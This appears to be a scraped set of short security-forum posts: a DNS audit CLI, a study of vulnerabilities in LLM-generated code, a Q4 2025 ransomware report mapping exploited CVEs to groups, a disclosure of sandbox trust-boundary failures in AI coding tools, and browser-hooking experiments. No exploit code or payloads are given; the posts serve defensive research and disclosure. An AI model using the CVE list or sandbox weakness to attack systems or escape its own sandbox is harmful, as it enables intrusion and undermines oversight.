I wrote a practitioner critique of Anthropicβs Mythos claims β focusing on exploitability vs raw findings.
Would appreciate feedback from others in AppSec.
[link] [comments]
I wrote a practitioner critique of Anthropicβs Mythos claims β focusing on exploitability vs raw findings.
Would appreciate feedback from others in AppSec.
Hi everybody,
I have built an open source CLI tool to help conduct DNS related audits. Let me explain the rationale and the roadmap.
So I have worked in DevSecOps for the past few years and at 3 different companies I have built som variation of this to handle issues raised by SOC tools and to help to do basic black box pentesting. After doing it the 3rd time I decided I should take a stab at open source and build it properly myself.
What it offers is CAA, DMARC, DKIM, SPF, MX, DNSSEC and some header audits (basic ones like HSTS and CSP). Output can be done via rich terminal, JSON, Markdown and SARIF and baked into it is an βsdkβ layer which would allow you to develop internal tools on top whilst getting access to the fully typed Python objects.
The next step is honestly inspired by a BS scare tactic email sent to the non-technical CEO and founder of a start up I was at where the sales person made false claims about the posture of our DMARC in order to trick the CEO into a sales call. Personally, Iβm quite passionate about security and I believe in a world of cat-and-mouse security (where the cats are the hackers / exploiters), tools that help with basic security should be free. This leads us to the next phase, a dockerised app to conduct the audits based on your configuration at regular intervals with alerting through the appropriate channels.
I would appreciate anybody who took a look, gave it a go and provided any feedback (or anybody who wants to help contribute!). This is my first go at open source and building a tool like this so really any feedback is appreciated. Docs can additionally be found at https://dnsight.github.io/dnsight/
I spent the last few months running Z3 SMT formal verification against 3,500 code artifacts generated by GPT-4o, Claude, Gemini, Llama, and Mistral.
β Results:
β - 55.8% contain at least one proven vulnerability
β - 1,055 findings with concrete exploitation witnesses
β - GPT-4o worst at 62.4% β no model scores below 48%
β - 6 industry tools combined (CodeQL, Semgrep, Cppcheck...) miss 97.8%
β - Models catch their own bugs 78.7% in review β but generate them anyway
β Paper: https://arxiv.org/html/2604.05292v1
β GitHub: https://github.com/dom-omg/broken-by-default
Hi r/netsec community,
Q4 2025 data, monitoring dark web leak sites and criminal forums
throughout OctoberβDecember 2025.
Numbers:
- 2,373 confirmed victims
- 125 active ransomware groups
- 134 countries, 27 industries
Group highlights:
- Qilin peaked at 481 attacks in Q4, up from 113 in Q1
- Cl0p skipped encryption entirely in most campaigns β pure data theft + extortion via Oracle EBS and Cleo zero-days
- 46.3% of activity attributed to smaller/unnamed groups β RaaS commoditization is real
CVEs exploited this quarter (with group attribution):
RCE:
- CVE-2025-10035 (Fortra GoAnywhere MFT) β Medusa
- CVE-2025-55182 (React Server Components) β Weaxor
- CVE-2025-61882 (Oracle E-Business Suite) β Cl0p
- CVE-2024-21762 (Fortinet FortiOS SSL VPN) β Qilin
Privilege Escalation:
- CVE-2025-29824 (Windows CLFS driver β SYSTEM) β Play
Auth Bypass:
- CVE-2025-61884 (Oracle E-Business Suite) β Cl0p
- CVE-2025-31324 (SAP NetWeaver, CVSS 10.0) β BianLian, RansomExx
Notable: DragonForce announced a white-label "cartel" model through underground forums. Operations linked to Scattered Spider suggest staged attack chains β initial access and ransomware deployment split between separate actors.
Full report
brandefense.io/reports/ransomware-trends-report-q4-2025/
With the news of Hundreds of orgs being compromised daily, I saw a really cool red team tool that trains for this exact scenario. Have you guys used this new white hat tool? Thinking about ditching KB4 and even using this for our red teams for access.
AI coding tools are being shipped fast. In too many cases, basic security is not keeping up.
In our latest research, we found the same sandbox trust-boundary failure pattern across tools from Anthropic, Google, and OpenAI. Anthropic fixed and engaged quickly (CVE-2026-25725). Google did not ship a fix by disclosure. OpenAI closed the report as informational and did not address the core architectural issue.
That gap in response says a lot about vendor security posture.
We benchmarked Opus 4.6's ability to find simple C vulns and found that the model flags about 1 in 4 flaws -- with a very high false positive rate and lots of inconsistency from run to run. Techniques like judge agents and requiring the model to justify its results improve the results to some extent, but they're still not great.
Iβve been experimenting with Chrome DevTools Protocol primitives to build tools for reversing and debugging JavaScript at runtime.
The idea is to interact with execution by hooking functions without monkeypatching or modifying application code.
Conceptually, this is closer to a Frida-style instrumentation model (onEnter/onLeave handlers), but applied to the browser via CDP.
Early experiments include:
All implemented via CDP (debugger breakpoints + runtime evaluation), so this also works inside closures and non-exported code.
Iβd really appreciate feedback β especially from people doing reverse engineering, bug bounty, or complex frontend debugging.